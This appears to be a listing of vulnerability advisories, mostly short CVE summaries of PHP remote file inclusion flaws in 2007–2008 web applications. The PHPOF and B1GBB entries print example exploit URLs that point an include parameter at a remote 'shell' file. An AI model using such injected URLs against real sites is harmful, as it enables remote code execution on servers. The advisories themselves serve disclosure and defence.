CVE-2008-0743

PHP remote file inclusion vulnerability in membershelp.php in Joovili 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the hlp parameter...

CVE-2008-0572

Multiple PHP remote file inclusion vulnerabilities in Mindmeld 1.2.0.10 allow remote attackers to execute arbitrary PHP code via a URL in the MMGLOBALShome parameter to 1 acweb/adminindex.php; and 2 ask.inc.php, 3 learn.inc.php, 4 manage.inc.php, 5 mind.inc.php, and 6 sensory.inc.php in include/...

CVE-2007-6347

PHP remote file inclusion vulnerability in blocks/blocksitemap.php in ViArt 1 CMS 3.3.2, 2 HelpDesk 3.3.2, 3 Shop Evaluation 3.3.2, and 4 Shop Free 3.3.2 allows remote attackers to execute arbitrary PHP code via a URL in the rootfolderpath parameter. NOTE: some of these details are obtained from...

CVE-2007-6105

Multiple PHP remote file inclusion vulnerabilities in TalkBack 2.2.7 allow remote attackers to execute arbitrary PHP code via a URL in the 1 languagefile parameter to a comments-display-tpl.php and b addons/separate-comments-mod/my-comments-display-tpl.php and the 2 configcommentsformtpl paramete...

Design/Logic Flaw

Incomplete blacklist vulnerability in index.php in Artmedic CMS 3.4 and earlier allows remote attackers to execute arbitrary PHP code via a 1 UNC share pathname, or a 2 ftps, 3 ssh2.sftp, or 4 ssh2.scp URL, in the page parameter, for which PHP remote file inclusion is blocked only for http, https...

CVE-2007-5363

PHP remote file inclusion vulnerability in admin.panoramic.php in the Panoramic Picture Viewer companoramic mambot plugin 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfiglivesite parameter. NOTE: the provenance of this information is unknown; the...

CVE-2007-5294

PHP remote file inclusion vulnerability in core/aural.php in IDMOS 1.0-beta aka Phoenix allows remote attackers to execute arbitrary PHP code via a URL in the siteabsolutepath parameter...

CVE-2007-5215

Multiple PHP remote file inclusion vulnerabilities in Jacob Hinkle GodSend 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the SCRIPTDIR parameter to 1 gtk/main.inc.php or 2 cmdline.inc.php. NOTE: vector 2 is disputed by CVE because it is contained in unaccessible code,...

CVE-2007-4738

Multiple PHP remote file inclusion vulnerabilities in SpeedTech PHP Library STPHPLibrary 0.8.0 allow remote attackers to execute arbitrary PHP code via a URL in the 1 dbconf or 2 ADODBDIR parameter to utils/stphpimageshow.php; or a URL in the STPHPLIBDIR parameter to 3 stphpbutton.php, 4...

PHPOF 20040226 - DB_adodb.class.php Remote File Inclusion

PHPOF 20040226 - DBadodb.class.php Remote File Inclusion Phpof Remote file inclusion Download script : http://www.phpof.org/phpof-20040226.tar.bz2 Thx Str0ke Exploit : http://victime.com/phpofpath/dbmodules/DBadodb.class.php?PHPOFINCLUDEPATH=shell.txt? Discoverd by ThE TiGeR...

CVE-2007-4525

PHP remote file inclusion vulnerability in inc-calcul.php3 in SPIP 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in the squelettecache parameter, a different vector than CVE-2006-1702. NOTE: this issue has been disputed by third party researchers, stating that the...

CVE-2007-4525

PHP remote file inclusion vulnerability in inc-calcul.php3 in SPIP 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in the squelettecache parameter, a different vector than CVE-2006-1702. NOTE: this issue has been disputed by third party researchers, stating that the...

CVE-2007-4331

PHP remote file inclusion vulnerability in index.php in FindNix allows remote attackers to include the contents of arbitrary URLs and conduct cross-site scripting XSS attacks via a URL in the page parameter...

B1GBB Footer.Inc.PHP远程文件包含漏洞

B1GBB是一款基于PHP的WEB应用程序。 B1GBB不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Footer.Inc.PHP'脚本对用户提交的'tfooter'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 b1gBB 2.24 目前没有详细解决方案提供： http://board.b1g.de/forumdisplay.php?f=13 http://www.example.com/path/footer.inc.php?tfooter=shell?...

CVE-2007-3315

Multiple PHP remote file inclusion vulnerabilities in YourFreeScreamer 1.0, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the serverPath parameter to bodyTemplate.php in 1 templates/Classic/, 2 templates/Classic Guestbook/, 3...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in PBSite allow remote attackers to execute arbitrary PHP code via a URL in the 1 dbpath parameter to a useronline.php, b ucp.php, c setcookie.php, d sendpm.php, e search.php, f register.php, g profile.php, h post.php, i pmpshow.php, j pm.php, k...

CVE-2007-2607

PHP remote file inclusion vulnerability in views/print/printbar.php in LaVague 0.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the viewspath parameter...

CVE-2007-2609

Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the a ETCDIR parameter to 1 libs/lom.php; 2 lomupdate.php, 3 check-lom.php, and 4 weighkeywords.php in scripts/; the b LIBSDIR parameter to 5 logout.php, 6 help.php...

CVE-2007-2422

Multiple PHP remote file inclusion vulnerabilities in Modules Builder modbuild 4.1 for Comdev One Admin allow remote attackers to execute arbitrary PHP code via a URL in the pathdocroot parameter to 1 config-bak.php or 2 config.php. NOTE: CVE disputes this vulnerability because the unmodified...

CVE-2007-2255

Multiple PHP remote file inclusion vulnerabilities in Download-Engine 1.4.3 allow remote attackers to execute arbitrary PHP code via a URL in the 1 engdir parameter to addmember.php, 2 langpath parameter to admin/enginelib/class.phpmailer.php, and the 3 spawroot parameter to...